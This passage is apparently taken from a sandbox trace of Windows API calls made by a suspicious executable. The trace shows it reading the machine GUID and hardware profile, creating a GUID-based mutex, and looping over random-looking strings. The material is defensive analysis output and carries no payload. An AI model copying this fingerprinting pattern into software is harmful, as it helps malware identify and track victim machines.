dwHighDateTime=0x1d5956a)) [0047.916] GetCurrentProcessId () returned 0xa20 [0047.916] GetCurrentThreadId () returned 0xa24 [0047.916] GetTickCount () returned 0x1145735 [0047.916] QueryPerformanceCounter (in: lpPerformanceCount=0x18eda4 | out: lpPerformanceCount=0x18eda4*=16810627325) returned 1 [0047.977] GetStartupInfoW (in: lpStartupInfo=0x18ed50 | out: lpStartupInfo=0x18ed50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18edb4, hStdError=0x467c01)) [0047.977] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.980] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1fd0000 [0047.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0047.981] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0047.981] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0047.981] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0047.981] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0047.988] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x214) returned 0x1fd07d0 [0047.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0047.989] GetCurrentThreadId () returned 0xa24 [0047.991] GetStartupInfoW (in: lpStartupInfo=0x18ecec | out: lpStartupInfo=0x18ecec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x45f3b0, hStdOutput=0x45f6e9, hStdError=0x1fd07d0)) [0047.991] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x800) returned 0x1fd09f0 [0047.991] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0047.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0047.991] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0047.991] SetHandleCount (uNumber=0x20) returned 0x20 [0047.991] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe\" " [0047.991] GetEnvironmentStringsW () returned 0x317ea0* [0047.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0047.994] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x565) returned 0x1fd11f8 [0047.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1fd11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0047.994] FreeEnvironmentStringsW (penv=0x317ea0) returned 1 [0047.994] GetLastError () returned 0x0 [0047.994] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x220) returned 0x1fd1768 [0047.994] GetLastError () returned 0x0 [0047.994] IsValidCodePage (CodePage=0x4e4) returned 1 [0047.994] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecb4 | out: lpCPInfo=0x18ecb4) returned 1 [0047.996] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e780 | out: lpCPInfo=0x18e780) returned 1 [0047.996] GetLastError () returned 0x0 [0047.999] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0048.001] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.001] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x46758f) returned 0x405c62 [0048.002] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.004] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.004] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.005] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.005] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.005] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.005] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.005] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.006] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.006] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.006] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.006] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.006] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.007] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.007] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.007] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.007] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.007] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.008] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.008] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.008] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.008] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.011] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.011] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.011] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.011] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.011] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.012] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.012] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.012] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0048.012] GetLastError () returned 0x0 [0048.015] GetUserDefaultLocaleName (in: lpLocaleName=0x18ebf0, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0048.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="en-US", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0048.017] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x6) returned 0x1fd1280 [0048.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="en-US", cchWideChar=6, lpMultiByteStr=0x1fd1280, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-US", lpUsedDefaultChar=0x0) returned 6 [0048.019] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd1280 | out: hHeap=0x1fd0000) returned 1 [0048.050] GetCurrentHwProfileA (in: lpHwProfileInfo=0x18ec20 | out: lpHwProfileInfo=0x18ec20) returned 1 [0048.050] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x30) returned 0x1fd1280 [0048.051] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x18ea90 | out: phkResult=0x18ea90*=0xa0) returned 0x0 [0048.051] RegQueryValueExA (in: hKey=0xa0, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x18eb98, lpcbData=0x18ea94*=0xff | out: lpType=0x0, lpData=0x18eb98*=0x30, lpcbData=0x18ea94*=0x25) returned 0x0 [0048.051] RegCloseKey (hKey=0xa0) returned 0x0 [0048.051] CharToOemA (in: pSrc="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", pDst=0x18ea98 | out: pDst="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0048.051] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x30) returned 0x1fd12b8 [0048.053] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x50) returned 0x1fd12f0 [0048.053] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd12b8 | out: hHeap=0x1fd0000) returned 1 [0048.053] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f{846ee340-7039-11de-9d20-806e6f6e6963}") returned 0xa0 [0048.092] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd12f0 | out: hHeap=0x1fd0000) returned 1 [0048.092] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd1280 | out: hHeap=0x1fd0000) returned 1 [0048.092] GetLastError () returned 0x0 [0048.095] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x315490 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0048.095] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x317eb8 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0048.095] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x317ed0 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.095] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.096] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.096] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.096] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.096] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0048.096] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x30db78 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0048.096] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x317ee8 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0048.096] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x317f00 [0048.096] lstrlenA (lpString="22U53309S") returned 9 [0048.096] lstrlenA (lpString="22U53309S") returned 9 [0048.096] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] lstrlenA (lpString="22U53309S") returned 9 [0048.097] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x3177d0 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0048.097] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3177f8 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.097] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0048.098] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x317f18 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0048.098] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x317388 [0048.098] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.098] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.098] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.098] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA 